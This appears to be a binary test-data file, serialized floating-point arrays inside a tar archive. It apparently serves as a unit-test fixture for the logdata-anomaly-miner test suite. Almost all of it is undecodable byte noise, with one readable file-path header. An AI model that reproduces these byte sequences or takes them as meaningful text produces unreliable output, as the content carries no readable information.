UG?LG?҈zG?ѾkG?_1uG?Q&G?8\lG?/KRG?vn3G?HyG?bJ1G?xBG?fG?5yG?Ӷ 籇G?ʚrG?pq/G?\cG?+Ǩ6QG?ݑoҽG?ặb[G?ZG?ɪNկG?vUƄG?=jG?bWF%G?бGG?1QnHG?sG?A'G?ʶ cG?Ql$G?%kjG?HwG? L3G?(G?G,G?X+G?_1G?>G?TA{}G?ԑ6:P#G?Ҏ i1G?ڼ[X.G?)[G?$K}MtG?zMhG?w'_G?4'rRG?rKյG?ߝG?^c-G?+G?ŋ G?z.%G?݇Q{G? Ot?G?<W|ȣG?}sG?EIjG?JƭG?-9tG?ad/[G?y,G? +xG?h"xMG?V" TG?Ɖ?G?AtG?òG?܎^G?+G?YzZu!G?M G?6'_xG?8 ](G?uG?·n\G?NoG?U=AUG?G?IQG?h5LRG?UPG?Yrf G?f_y5DhG?N,}F G?:k&G?Q[G?XUG?~zqFCG?ՑG?yN\G?DSG?_Q;G?^ G?߽\G?OG?[ے":MG?y޴G?Ņ AŹG?W֬G?N$G?dzG?#D G?埒G?LQu#G?ג(B3;G?PNMG?{0G?e'qG?֊)ُDxG?Yj+'\G?G?!L`mG?pwG?ID7G?揱G?]5jOG?VtkG?їdG?1.lYSG?> G?r iG?O qG?%~@G?jG[G?G?BW)^G?Z0]G?FI:G??`5G?OHG?պ#G?$&}G?c3G?slDG?wkG?s}UOyG?ΚatCG?YuׄlG?ن.n-QG?aLqG?钚G?~X>mG?6c5G?oG?sFnOG?֝G?܀}G?odG?HHG?1-G?TG?VԕwG?R5G?VXsG?7ApG?֛WDG?ǧҨG?(5CG?֝%G?f]ъG?~p3)G?@t#.XG?(gWG?ߞPfG?4G?*~}~G?1g?fG?AZcG?G?aG?Q#G?ʝ/ G?ʦ wfG?(XλG?QG?+DG?@$pG?i9G? "1G?ZG?#ƄG?5:jnG?0,G?cHG?-+f6G?^aG?G?!%xG?ıket;G?ر]G?6h)G?XґG?<>G?48G?O=3G?Y?1G?6'oG?6F;EG?pG?qjuG?f7.vKG?هG?UѿG?{ϟG?{UsTG?òl?G?ʋǪG?XG?ōJG?%5G?ל.JoG?~: G?iVzG?kI~G?~K2hG?1s G?1qNG?Ԥ) G?ֹYa G?PeG?O}G?Žfؼ#G?Z~G?,}͎G?͓T9jqG?jBq&G?%` BG?B5rG?נŐ-ƦG?5Z G?aąG?S^G?˺G?G?A]G?}cqG?qG?y$rӋG?޸0,G?_MSYG?kVG? 굜G?rEG?t[gG?<܆G?ԁuG?L:G?;&G?0,MuG?ssG?\A hG?+G?1NljfG?:G?G?֪ڏG?իBG?5WmaG?ncG?cL2}G?bmG?ܨ0 G?k_܅G?r#.G?O&i@bG?bЎG?rw]G?H LG?pNG?©e2gG?{G?ۮ G?A VG? "֟G?=gG?кWᘩG?kD8}G?ʲjG?h۴G?ΡU+XG?'21G?͜߈G?_bG?lV$G?[yw.G?c uRG?+ڸG?5`OG?P%xsG?%G?\v#G?e7G?mG?*$G?OZu]G?@Z[G?R|Q`G?Gs>G?i?KSPG?+;rG?I5G?rt0G?ܕPLG?Zi!G?GrýG?ƚ+:G?x% G?M~2QG?SCG?B/J7:G?XwZG?69)G?s0&G?!G?\RlIG? G?g8/iG?ƽRg2G?LG?h:TVG?׈iG?VTG?#G?qcIrG?΁uE 2G?$8jBG?G?eG?~RUEG?G?@u{&G?`G?ԏ'RuG?RL G?ӀmQG? G?fM@G?oG?ۗN͂G?UG?؛XG?Neb_G?\G?ĮaG?ػ pG?sWeG?Ɂd'G?WG?#G?Q2JG?ڥ\FNG? S0TG?otG?9*RTG?-#G?SGʁ,G?>eG?βΒ?G?z CG?ȏ G?M3_G?NKG?Fd%e](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/beta3_data_test7000066400000000000000000000647021437606560100275340ustar00rootroot00000000000000i](](G?G?L=G?4 !LG?Q+$6$G?- G?ߣ: G?ǿoG?rG?Ӈ`eZG?$*G?_g\G?ՒMG?h3G?kUc\5kG?j!+G?f@;ˢ8G?@agG?ۆN?%G?ԴG?ɲQG? UG?v-G?h]G?uN G?#G?W WqG? G?Ƚ%wS%G?N#G?" b G?׍VYG?IYaG??KxG?4Ī G?Y{G?OgG?ȉRv_G?EG?HT"G?ogzG?3kK`G?uˢG?أpG? KG?àoG?֤haCG?Ϯ{G?9x8G?ᚕ>|pG?qQG?EK<ϋG?5^G?tuFgG?K ]5G?G? x(c<G?i.RG?neG? dIG?u5J'3G?VdkG?QlxG?>=,aG?4]lG?NG?(ϯg=G?q=G?}x뵗G?j/sG?+G?/:}G?SъG?ߒҞYG?נ/ڀn^G?'ɰG?ʊQTY+G?G?@G?F^-G?ω4G?% fG?7AG?5 }8AG?sVSG?5 ZG? ;G?- q}G?ȭ:9G?ѡ4\G?ǨJG?X]sG?J(G?bCG?G?=ʗ#G?g䒸G?֢vdG? Gw(G?׌xG?CsZG?aVG?֖RG?C3G? -pG?٥rPG?K(fG?)z~G?#j G??)rG?-IG?ɳ) G?mnÿG?d(J&G?Q?G?<'G?y<;G?ךG?H\ G?O G?Ȳ ʨnG?RTG?ҕ+E2G?ٶH`bG?EQG?*IG? WG?2ؽG?G?˺X G?˙FG?XcN[G?k(G?ܡ|9ĄG?ܫ42G?ӘK,G? fG?ӐnaG? ²G?ەݛ\G?T G?<ΊLG?ԤrbG?aT*G?îLG?eY G?!%G?кŬG?YG?[L}7G?S]G?l*kG?9oG?4RG?/6G?*G?jIBG?ڠ٠1G?z6WOG?Ҋ%^G?rG?!OWG?>nG?-GjG?Փ6RG?QYwXG?ApG?jG?N٧G?_zG?m}(4G?=CAG?RGG?ب(G?;|nG?·'[G?|{G?* G?q4cG?G?i8ٽG?Ϲ.G?7G?]28G?ԑmZkG?[s(G?sпG?(:4G?z8`*W9G?SZ G?AVG?Py%kG?ѧG?v;G?X)DG?ŸskG?uсG?[G?8!A cG?l JlG?̎ǽ&G?ۿTp?jG?\[SǦG?Չ@G?G?(+PG?YG?%.pG?+G?ȵ G?G?~{MG?lj8.a$G? xG?M-G?'{G?֝GG?ӗ#1G?܍)mG?Ĝ1G?^-%[G?͑G?УoG?ӖUG?lL]G?ס"G?H_ G? JV*G?&7\+G?jeBKG?}ARG?Ƈ>2G?ZG?G?!}G?bX9ZrG?l>G?G?mÿCUG?ZA6G?wG?ŖG?A&G?>בG?ؾĎAG?wG?㋦p>G?neZG?QnG?U K~G?~}(G?⊴XG?ζՖG?טpG?9G?:;SG?jo%G?8VG?E i[G?=geG??CG?zG?29G?~G?Y' IQG?9(G?kjnМG?%tG?U=G?ЏʷmG?PSG?==aG?^G?G?/hG?`BG?UqS2G?eG?3zqq-G? SG?RWG?տA$WG?,qG?-B(G?jٹ6G?X \nG?HsvjG?жP!G?޹(G?5TgdG?UxG?ՈePi5G?gUG?!G?ثM.G?b̔G?־G?NPE7G?v70iG? 2`G?Q1ַG?׭(tG?ֵ:G?骤(lG?љR}bG?G?(OG?щS5#G?PKG?'G?9CMG?GG?=;G?EnG?ȋf*G?yӍ*G?<>dG?䡗qJG?\G? ZkG?e9G?ɍ8߄G?ŀM~G?<䵈UHG?\G? jѸ6G?iG?'4v~G?15G? 6±nG?+ĽG?FG?/ G?iws7G?ܴf+G?PAOG?AmOG? Sl1TG?#:$G?ޢfNFG?އ~1ȊG?طWiG?TAG?QlzG?y{XG?UQ,NG?ΑcG?01v5G?dExG?4 `G?ŀ:G?mE*eG?*G?&G?7KG?(G?۶G?>DG?"NG?ɝAQZG?F636G?/G?FgG?·L*G?a\G?]fG?DG?=YP;G?pG?ے3❶G?& G?<;G?G_~G? BG?R`|G?d~0&G?'Q&G?P'G?^G?`kv>G?ɝ@ƕG? G? G?0|v'G?AHG?QIG?ܓڻ'/G?`,L'G?N.;G? i)}G?(G?;@G?z:G?Կ/5G?& 8G?ÔvG?Ֆt$G?Φ^nG?$G?otG?U"G?Y@G?π,$G?ĭ1 hG?@$94G?$BG?@QG?rG?4{"/G?2G?ؚTG?sQG?:yaG?" c#G?ã}n&OG?XG?M6-G?@ruG? xG?#M/G?xJsG?t4G?بG?e~G?9G? u^G?/xG?uӰ׎G?{7pגG?ziG?̦ePtG?,,ѿG?*rĆG?%LCG?fUG?;@G?!$ĠG?wVG?prG??teG?#'G?KxRG?$TG?uG?-&G?͈(G?o|]'G?EPǎG?#yFWG?%&M G?sBG?:CG?itՍG?R_ nG?MG?Ӯ]{AcUG?֋moG?TG?"+G?w`z*G?|rjG?װ;a"G?1G?˝0ũUG?9 zuG?G.fG?5^G?ON7#G?7PG?_}G?M& G?:G?juG?=HG?tR+G?ęXG?gkG?{)G?-cG?|3GSG?A/Z0VG?,{">G?ޜXG?o1G?tG?jNG?UpTG?T3ҰG?ppG?j:N\G?IYWG?ڒ塥fyG?۞xpIG?̐ݴqG?G?u G?JUG?uoG?(MQG?r؄AG??G?Ɣ[ G?J%® G?Y0_G?a7YG?§G?ޠ%G?HjG?s2,hfG?AG?ſ`G?3 QG?S`7G? IbG?5sHG?PxG?GG?oӇG?|]G?IgzƋzG?iG?JLG?9}#HG?ڥ439G?ڡG?4VSG?E|G?~5U#A3G?spG?͑ rG?|G(G?Ԉ,G?ۙ1iG?W NG?HzG?9G?ɶd wG?'DG?# G?bzjG?(5UG?ɃM2G?+~.RG?BH UG?oG?h'JG?*y~PgG?G?,ztG?PG?sxB?lG?EԪ̶NG?٠˫VG?Ե2G?A5{G?q\NG?{#InG?aN5$b*G?Z \G?tG?S*+G?!3G? a4G?ZJ6G?EZɗG? >G?!G?[G?$o e(G?BM)G?à=_G?сvpG?I5G?hK:;G?Ն!=:G?۶.G?ћG?YDG?"VG?iG?ЙxvpG? aDjG?U(V&G?]~G?½'9G?%[aG?צ紟G?ۜG?,G?_0jG?؟6'&G?Ue-HG?̀iyG?Խo}G?ރKG?٩1粹G?ڑPkG? _G?-详FG?d"G?g;vpG?ӧFoG?>SG?ؓ\AG?=(nG?߃XG?_G? xG?V(cG?ĴDVRG?93rXG?U:G?ŵ G?4vG?4h((G?ˏ|G?޿BحG?أ> ߞ^G?xHG?-xKXG?#xG?6G?R G?hnŴG?qŬ;G?G?\9@G?\!PG?4G?ן]LG?E6Z.hG?glݡG?}VG?#G?,ßbG?X'=]G?/G?G?G,nG?~IG?@sG?=G?lAG?j:01G?\BG?Ԅ?WG?3jCG?=4kG?GdzKG?>VvG?|CnG?eG?ϛXG?\vG?ݝMhNG?\p+-G?^G?LrG?#6BEG?-d;G?{IG??AG?n]G?.G?S@VG?и~G?# G?ݎ~7G?>EG?..6G?gS G?`Vv,G?ΦD#G?G?AqG?[tG?֖G?AGlG?,"p@G?+;G?,XJZG?ɱ_DG?ƪ#"ܽG?uG?0G?MdKG?ږgcG?4EMG?YdG?t7EG?HhG?;HŁBG?bzG?kG?G?*;9G?GQ6G?q', /G?ƽOG?G?!?G?!B2G?$#9G?0ݑaG?ˮ%VG?+ G?3X,DG?/IՍ G?FdyG?g^{G?l\lG?՗ӉR&G?,OjSG?Ҫ[M,G?ofmG?R/yR G?'6G?tüG? .>IG?G?5y?G?4R G?ƭe G?߫G?ٶ%aG?SOJG?UMiG?>d"~G?긏MG?mC^G?ue#vG?ÉʣMgG?iרG?ۯMG?5>G?G ?G?V~G?},y;.G?_>G?DcG?G?zfCG?JmG?̻ŜnG? ; U G?ȇeG?Ʌ G?,a/ҟG?ȼ3G?XG?ibRG?KgXG?5WM3G?I FuG?hiG?՝ G?J+XG?) Bn6G?)a(G?JxG?1U >G?[wG?KS7G?ɡtnyG?ՕIşG?F|OG?oZ/KG?ۭ-;4G?JG?|G?AԊG?yi#G?jW^xG?G?ƂwG?.ܛG?~G?(q#G?xG?z(G?Ѓ&0p!G?ӴqG?#nG?vYG?҈}^G?1yAG?XG?*G?hG?U=Y`G?;0G?CnC"G?2G?A`bG?M3R/G?W֨G?.PG?qLG?a;<G?&WG?_+G?S NG?вOG?~@ЖG? 3G?apG?Ņ ՞G?ֲCG?PeTG?o+G?Qm2G?̮`G?vvVEG?\VG?߼3G?ӂuCG?zG?ζfG?Hw.?G?XzJ7G? mWPG?џG?jp74G?ںwhG?Ӿ[ UG?vgG?ĩS G?4G?m/ G? %_G?w]-BG?k! ?YG?4 G?~G? 9*G?ׅG?̳zJٞG?Y:G?kGG?xoI G?%4{G?֙HG?`kG?G?hӄvG?Q5aG?Y^&G?^G?{lG?4<$G?WG??_KD$G?/̔G?G?~G?[G?UG?׆G?BMG?G?ѭNG?8jG?SC{ҳG?,e@ G?foG?ԖG?)=OJG?Vy< G? #G? wG?՝PkG?G?r&GG?'G?n"(G?ç ~gG?>ɮG?k1,%PG?.G?ū!#?G?(vUG?d#G?t)1G? }8G?"AӲG?cbG?㰆PG?G?ś\G?9CcG?SeG?¥qG?}H'1G?x7G??f4G?!zG?-랓G?O/G?;}ZKG?/JLG?θJG?_k;G?b5G?S~Z,G?ؤuG?-8X %G?aq ;G?l-/ G?g2<G?æ+*G?׈orG?ξB{G?Z[G?ƽDyG?˧G?9vG?~ wPG?GIvG?ؼ2HG?\3FHG?kG?ZN#G?5G? jwG?(uG?02tG?˨G?Zm4G?6=G? JHG? ."0G? 9=qG? #G? 5lhG?-Qg*G?)9AG?Yv(G?w=G?͸qJ4G?>B6DG?y G?ŷG?#UZG?ο[ G?&ǺG?7/G?^h 0G?֑P;G? ǵAG? TG?bPF9G?ѭz1lG?‚ɱ,G?-wlG?${`G?ߔ@>G?CG? 7FG? G?kCG?? G?=G?7GwfG?;j;WG?C{G?="i+.G?{EG?N7\yG?=WG?+TG?E/f~G?G?HKQ0G?St^0G?B_ LG?ٰG?ѴߓIG?&=r!G?޹G?ȕ!LjG?{rcG?_GMG?ĹV̵|G?žJG?W*JG?7r\4nG?_x[G?%G?ԉ-gG?'`8 G?CL72G?m G?ާMWG?Fg G?Ɖe]G?B,G?WG?ڦ݂G?vG?8!vG?g>G?G4G?[jܷ4G?KG? ,G?ʬޱIG?ڸ)jG?pЪLG? FlG?1UcG?ݿyG?$*G?5UeG?ͰG?¾ aG?$i?G?/ nG?ݕy(G?oґG?MG?B_;G?G6[G?^ G?VTT!rG?wƩJG?֓+dG? G?]@G?JfãG?LJ[EG?MߕG? o4G?d`RG?@1G?B^𤕹G?ءG?7t8G?L 'G?ViG?ѷTkpG?kd`G?` G?{tG?rPG?ͩQG?'G?גٿ,bG?Ў碥G?ނ4G?ЀfƙPG?+6G?e|G?G?ŋف+G?ZG?І37G?}c?G?z)G?v[k":G?tBG?¸#]G?hS5G?@6]G?FkoG?quG?ӕ&,G?zg>G? G?]9;G?ŏZG?eG?_x8CG?<|ޑZG?xyslG?ߚtG?ҫhTJG?G?P+&G?mG?2dE5G?gY76G?MkAAGG?G?2SG?cEëG?rG? NG?ϑ2G?YJVG?Ԟ2z/G?ꟸG?Z)G?qG?ؠG?7;zG?ݩ lG?]2G?ӻ~G?ҐZ6G?vG?=w}G?!G?MRG?Ԋ8G?T4G?돟[G?l%FG?'BG?]|G?\_`G?>06G?'$KG?^I~}G?l~[%G?ZSEJMG?G?a &G?Њ/ypG?ՏAQG?]G?Տ99G?Ӽ:SvG?J̍G?OG?3G?ٟԭG?1-OOG?سG?HG?@G?h ԞG?,,r-+G?sYMQG?eyG?"W5G? aG?ڦKJ4G?,wG?6I.G?ⴼ]G?NC)qG?ШG?̩6G?U3vG?ߝ. G?㓍ՑG??^ XG?BqbG?wB-G?M4G?0x_G?DVu5)G?ǽXG?":G?`\ G?{ąG?Wf"G?(&s G?Րs^ G?܊ G?dkG?gFo-G?AdJG?[,EG? | l\G?۴G?~@cZG?ʪ8݈G?ag]G?Baj G?(G?D>_G?W~0hG?nz~G?ӴfG?۱'G?M\KG?F-쇢G?TV6G?6<G?HwG?k8G? |G?ǚ1}6gG? ]{G?^ S:G?,gG?\aDG?{7DG?=3G? gG?XpjscG?rIߏG?!nXmG?WOPG?ALɾG?HjٕG?*q 5G?0`=G?ErG?zR6`G?b]G?H&;&G?F. G?BjG?'ӵG?E#ѪG?<Z~G?N/u|&G?,2dG?o-dG?ӑ*:G?VaOG?||G?߳6 G?eG?=.vG?ȱͻG?˒F?2G?G? /eG?҅!xcG?-##G?ͱJG?Ѥ&M G?i5 :G?FG?pEG?e`+MG?xB@G?.H%G?gR7G?ߞG?`=G?ҍ`U3G?΂A4G?ԩ D)G?N!1IG?!)G?qOG?H G?ўwj0G?ˍttG?RyIG?qw.qG?z)=G?vgG?Ā5G? gG?^ʌؔG?ǝ)WG?H%  G?W"G?*$ڝBG?)M!G?zdG?'N;&G?{K&>G?fߥ߼G?Ǫ紐G?PG?g%cG?NPwG?}zFG?ʴ-G?9G?~h!>G?;)G?ΧJ G?ܕ)/2G?ٴzG?c0mG? OXG?ms?BJG?7RG?0t:G?փgG?8֢G?#CfG?APGG?-ٳ/G?3>FxG?Ȉ"`_G?4G?c}G?T2G?+;G?2GG?˲kKG?G?!1P PG?>u[G?5ܹG?)KG?J /ˀG?Լ);G?FHG?Փ5#sG?녷G?ƫ`G?y 8G?/G?ҏLG?[}G?_L_CQG?1G?v+7G?iFzyG?[˭n>nG?~[[NG?竨 G?Q],G?RXG?Ђ72G?r+ G?C%G?*$G?f 6G?o!G?tG?o (G?:OG?aG?C)'G?֏XY՞G?ǩcȥG?jA?G?o#GfG?m4P)G?schEG?ߘG?}AiG?S#G?Ɏ.}CLG?bG?6eG?IG?NG?iazG?TG?hJ G?ZwFrG?JG?yACJG?' ;NG?/G?mνG?ajyG?AEOG?6(h2G?ѫgG?KVQG?;|G?TsG?HG? G?^.aG?IܯgqG?xG?)sG?+9G?9{G?δ|G?Se](G?kJG?Ͼ|PG?Ԑ~G?# >`YG?|+G?Ӄ "G?Ɛj~G?knG?:G?b#xG?6^G?ǩG?>U jG?$1YG?LWG?RܼG?̃ Y5G?!RG?"tnG?֩R]G?=2$pG?ԑiG?U>CG?ـ 0G? JaG?nG?6uG?:}G?? %3G?\EG?֕ԀAPG?G?N^AG?(G?.G?EBEG?Q oG?nrG?f=iG?(G?ũ  G?*VG?D{"G?5rPG?O+hG?+m+G?(@G?փ'rݸG??4[G?bY9G?СPs^˚G? G?7MG?MGV\G?e kG?;')G?A#VG?٘EJG?bG?Ϋ{G?vG?SؑrG?Ό[ G?(K2aLG?ØID8G?3bFR7?G?ؙܸG?kʙJG?ɝD7|G?rzG?4ȥG?X6}G?ڨ0DG?pȍ8G?ǘ2;gG?p.G?ŦY G?xW3-G?wrG?3!*gG?G?/uG?ǫ񌃸G?ԋ.O0G?jgG?oSNMG?]"7G?ԥ^G?׎uG?ˤ@9G?ߡG?FTG?AFG?0&G?Dˈ{G?a1G?7 DG?}s^G?! C}G?!8G?pG?߱Je*G?JVgG?6;G?6 }TG?G?zYzG?ΊײG?qJWG?3s+_kzG?oOPG?c>G?MUG?L@`G?š =G? HKG?\ÂnzG?X>.SwG?܄;`G?G?t}G?׍S@&oG??u! G?‚KKG?n3OG?DAG?Qb8G?xQ G?ִLG?e$vsG?^ZxG?|ktG?d[~9JG?ڝd)G?҅#`PG?KG?㲄 {OG?iG??4yG?K &G?SpGSG?r_YG?ىVG?#G?fBaG?0T^iG?|g!G?6@G?8UcG?6G?r G?5lG?TZ~G? PwG?.aiTJG?q>ctG?rhG?X E%G?G?݂\4G?Cm?G?B&] G?^G?sNaG?0xG?ՔwG?{4{G?.+V$G?:$G?ڵZG?ӿ ^G?J =G?,f:G?ԙG?@G?ʹ ~G?gh-G?֥AUG?d=ּG?}k G?mG?{Oj}G?j޺G?vEXG?wG?O3G?r`qG?LG?'zvG?c-sF?G?.^XG?ὼt G?ƯIG?okQG?x:VG?G?85G?ׅG?PܰG?<{qG?̲$G?=wpfG?ÃTi`G?ßG?̝HG?>Wpȍ6G?FeG?\7 G?M؛G?~nWG?lZ{YG?VDG?zIG?Z)G?ġŒG? w G?KGlG?LsalG?rK]G?:$G?(yG?J)XG?婈PG?@G?`DxG?XbS84G?ӔCG?ӳG?.TuG?BG?(夬G?G?İ:`-"G? &0]!G?J}G?уxMG?LhT:G?;y4)G?TG?" kerG?AG?գB`G?nIG?p>G?Ȁ]G?ˤٲG?ϢT=IJG?;jwG?{G?2mG?͸G?ٿ#ЏG?ի՞G?p89G?v0;WG?&y G?T̾G?KG?߇b%kG?BM}G?iQFG?@ܴ=FG?q{G?Zv G?]/2~G?RKIBEG?,z=G?@`TG?J G?lG?G?҇;KYG? F[G?Iݒ>+G?9xG?ǙPx=G?ߗKG?ՂBG?;G?1%Hu7G?V6 $G?ΪKGG?*|G?;GG?۟`G?W#G?AG?O8G?Ʀ4G? # G?QG?vKٞhG?>G? S(G?ְ[G?qG?DdlG?ƪ[)dG?reG?>v[G?d_G?P:G?N:~bG?3sG?BXCfG?f'G?XG?CVn G?Lf:G?Ĭ9G?ݙ8BPG?䤼83G?gG?m@G?­iC1!G?ؿG?< VCG?، U[G?g> 'G?#G?KV_G?c-|G?q ;G?=-EG?¤D2_$G?yFG?HG?^*G?WG?\`V tG?g'G?ӇLΈG?3G?(G?G?Im:hG?>SG?% ^OG?W&zwPG?hXu~gG?Ӥ$7[G?ӿRJNwG?G?"lfG? i"kG?k+M|G?HG?ߙqzG?V; =RrG?)<'G?!*+\$G?ˤD G?Ҵ]G?qnG?xǜG?7 7G?}_%G?| WG?^ c5G?وG?ɓ\E0vG?e3 G?i~ZG?^DG?Cu{>3G?$ΈG?R֊X)G?^egG?P G?@|G?[G?o.G?rՊzG??RJ0G? oPG?em䋝G?H G?¿-i/G?/ .G?nJXG?Ի0G?dsG?RTюG?g53UkG?[ȥG?!e_3G? a0G?φ`FG?G?<%-G?Zvt\G?faRG?1ݚ䠃G?8G?:G?>k"G?7a 7YTG?nG?˽?1G?f4G? G?kׁoG?ҕʶG?`8G?tձG?kG?ȫ;xG?ʤЧG?MJ~@G?+xG?z<eG?ЏJ G?Q1=G?JXG?'w G?ї1rc G?qcU G?Ps0:G?1cCG?#IG?Bs9G?etG?A'}QG?ٿHG?SJG?=FG?O%EG? YG?Ԁ]5G??cG?£ G?mNlG?"ʊ'G?h4G?YY/G?؇0G?e#G?:|7G?Em[G?pG?Ͼ}G?**6G?ʨ>G?Q!}iG?nCyG?G?G?G?'GkG?sPols_G?M 5G??ZG?  G?DžG?7G?-G?;oքG?VDG?G?ʀG?hg2G?^L2nG? #G?KèG?>c|G?̟4G?t"wG?>מG?xV81G?Y7LFG?ɵG?U[G?%>@G?҄G?<>tG?QG?Օ{I@G?G?:-G?G``G?ϿDfG?#wiz G?ô k\G?z3&G?^pOBG?M5$ZG?AG?=Hx|+G?}G?A!G?{!ǠG?ر-+G?hvqG?rr.G?ƞ #bG?̇u1G?-o"`G?d\G?7/G?WpG??mJG?완G?V4>G?3W2sG?٦>VG?Q2wG?g-_lG?ٲWtѪQG?0/G?Ȼ ;G? 6UkG?L(wG?hJG?b٤G?ʛBG?5C0G?Dm4G?uב'G?HsgG?L螝zG?BdtG?hNΡfG?T =ՃG?x2'G?5QG?K2VG?f'2WG?unG?FgG?Τ~X;rG?|H(G?o2w\$G?…鲅G?n2kG?Ũ4G?;7ígG?ag݆G?=v;G?7֍G?1G? ܆8G?<91?G?wJG?-G{G?sV G?BPV}G?/)G?0xG?~'ŋG?LPdG?ƽ3f2G?,ʼnJZGG?ׂd@OwG?uG?8'rӗG?o#qG?[9,G?c[x,fG?G}G?'Z:G?V$n=_G?LG?tUvJG?OǥJ'G?suUG?lXQ@G?d{G?0C S//G?G?G?pG? ]G>ϨEfG?( G?ĉgMG?s"G?ݭ#G?H1ZG?s7G?_LqG?E3mG?A_G?; pwG?xG?\KfG?ՠƈ G?TC\G?ЭRghG?`[G?c,G?濷^G?IG?g4V'G?i?6ϝG?a26G?ԑIG?5PN*G?)mG?z ^G?[gG?1ڳhG?]\G?.G?7,EG?b֒G?RM:lG?֩bNG?moG?ŇG?`SG?fG?̻n-G?5; 5G?7G?xdHG?fHbG?E) G?z`LLOG?(WG?̈DG?ܝWCyG? "}iG?`XG?G?K)VG?Z)G?-%uG?JlG?4FVG?A2kG?ҷG?tG?M- &0G?. wG?‰03{G? K|?G?mG? ${&G?~3+}G?MYTG?j}( ^G? (6pG?1|\G?ч祖fG?kG?f.G??G?ŽӦG?[G?Փ*G?hQ_ZG?m4G?rG?:[G?ٗYt#G?ьE4;G?oG?PFG?NG?W6mxG?`+8(G?FG?NG?7 ;G?cG?˲' G?"\eG?G?6U0G?VNdvG?o?G? ,%G?RiG?##"mG?xG?ɛ>G?HG?X5G?FhSYG??FWG?tG?kyG?M+G?%>JG?,G?l-%G?vFG?зʰiG?^FG?-Z|G?kR}G?*aHG?|EG? G? WG?Qp8bG?H/cG?"G?_ZG?< 'G?Ь*G?ϧvG?ƺvG?dqrG?J}p6G?̣G? O;G?j.G? tXG? jXG?lcG?oG?هG??ҜG?UI1G?FObfG?Шј׍G?R7xG?նv'G?zG?G?׵/G?/G?8) _G?P+MG?«7]{@G?osG?)wZG?[\G?̮_G.G?/SG?אVVG?G? \@G?PiG?ȖdG?zQG?%QG?n'LG?ʔo/5G?$`G?G?Ï]G? [RG?XbIG?r(G?~MpUG?Ɉi*G? чG?2G?PG?C)G?SwiG?p.ˉG?Kzn G?0XdG?D˻/G?(ˋ%\KG?a\U*G? nG?J!LG?/sG?:ôDG?hEDG?^HG?1-=G?+}SG?ǥcG?JaG?kg}G?3\mG?%`G?bIG?вPEM+G?Sy G?ayEG?xuHG?<׶G?ՅTywAG?|Þ PG?hʤdG?2^&G?ҝR+G?vG?Ybre?wG?~N5G??(G?6MwG?FG?bG?UG?Ճ TG?X#bG?7_ȶG?Sb_IG?GM>ZG?Pi G?X߻G?o G?Ç8-G?+vG?rG?_G? )G?E]„G?5UsG?fﻅTG?G]D͍G?P?mG?@\yG?Ɵ_SOG?н`{G?MsG?ͽu3G?uX?G?G?a-G? G?Li"G?W G?̊{f=G?^:G?l⾨O$G?X1lG?aeG?¼ISҺG?]{=G?Tc돦 G?%lG?G?ʮeB.G?ƌ9%G?Ķ$v;G?l>v.$G?_G?z B'G?r$,G?.YG?yQ2gSe(G?LwG?NG?G?xX~G?؉!cbG?ю,TG?,dG?ݢG?Nh G?BxG?WJWG?r G?6G?i{kzG?oh}!7G?w띧p G?O!FG?+V_G?ƂG?չG?*ֳG?= G?UJr_$G?lAG?qJNG?(qG?7|-G?ã$CPG?yճJG?ʙG?m*[W;G?H"-dG?I ۅG?g+~4XG?:G?rG?{wOG?B8bG?qrG?5mG?a=۫G?'IG?jG?L G?8stNG?YB[G?: G?pCDWG?ѐR07G?!ᥦJG?[T<#G?h{G?okZG?ft:G?Tr?DG?zxLG?cG?~SG?{(G?sAhG!G?Us-G?VDjN-G?(H3KG?0~!SG?E>G?,'dG?KgG?ÜG?pi>QG?gdG?n=G?nG?G?}GG?uXG?PzwG?Iz.G?lBG?ޱeDG?r4iG?'G?2G?JG?Gi7v G?65G?ͦiG?俥"G?\tyJG?md7G?A LԶG?w˓=0G?K2T'G?Px&/G?SG?a(SG?PƉG?%G?j}ҿ:G?'϶G?=^G?~f 2yG?٩G?B*G?mo\G?]G?laG?DxG?6?nCG?6dG?tG?eXG?X (G?,+T^G?9G?ȎJtG?OmG?֗W_AiG?َ0gG?uLG?fVؕG?P*6G?l}G?˯~KG? G?W͒~G?<(F_G?aG?ХDgG?3_ G?\G?8aSdflG?7IG?b2Vo G?-6UG?8󱉏G?lw;,G?a\G?q/;G?IG?l9KmG?`G?_7G?]G?3^.G?J G?[{G?ÞiG?Swj[G?Ť!L;G?ufyG?G?AG?óm^-G? yG?ot'G?ю G?5DpG?*,vG?OwG?х9I{#G?gF2G?_PCYG? R@G?6xG?^G?vG?PaBmG?@*߁G?^G?Jr,QG?aXZG?HG?8BRG?4cRG?١G?Fz@G?{G?èLG?>{DG?[Mhz:G? #G?ygG?-d5G?QψmzG? TG?*'G?=WG?iG?-tG?O<G?߅G?Ϗ=g)G?ѓG?7G?.cG?7OG?EtHG?BG?~yG?9 NbG?tG?{5XWG?BH!G?<G?&˃tG?ΔɲYG?<5KG?iG?^G?)[G?JDjG?cyG?GG?pG?etG?%G?Y4G?]mIiG?#>BG?|.o$ĂG?ivKG?eG?l[/G?HN)G?٣o#G?JPG?l#\G?'G??aG?tǬG?tLG?M/BG?.!eG?аyG?џG?uG? DbG?ԪG?liG?iG?![KG?GPmͯG?!EUG?35G?5-8 G?Ӟ%CG?ʈȚG?v?G?%֫9G?\âAG?PsG?JBKG?7c9G?E#G?%"pG?q2G G?_˶G?@՞6G?մ[X=G?!&WjG?~hYO8G?Њ4G?y+ G?,l=G?rpG?U HqG?2DG? ;0yG?,}~G?uD[mG?Pc5mOG?܉ G?^6>G?|G?Y8G?Z>gG?š،ISG?AckG?آ{VeaG?@UGG?81oG?+ۄW3G?|˧:#G?iG?!_G?ktEG?2 EG?NEeG?O|pG?X/G?׳ҿG? f gG?9^#+G?#Ó@G?՞>0G?]e G?2JG?nؚ&G?,G?^JG?:0G?T;G?eK"TG?VjG?FmG?+[G?0 G?"3G?ſKrG? G?/L۫`sG?~6TG?FWsDG?95IG?{G?90G?4ΓXG?D՝"G?Y\%JG?%9xG?YڟiG?O }G?ΩBG?3 G?>}G?rìG?WX[G?Z G?\G?'OIYG?͙rG?C腳G?k'xSG?6.ZG?ܐ/G? G?cCYGG??#/ G?BRbG?T=G?OG?,MG?ےF)G?blHSG?$u\…G?{kG?LsYTG?ȓR>G?G?.(G?#\G?jMÌG?@G?#G?uGG?{-G?ZTG? ViG?jF~-G?G?6tWG?D,qG?{hTj[G?^zMG?jq?8G?+[bG?,4TcG?4/G?n ^ܾG?: 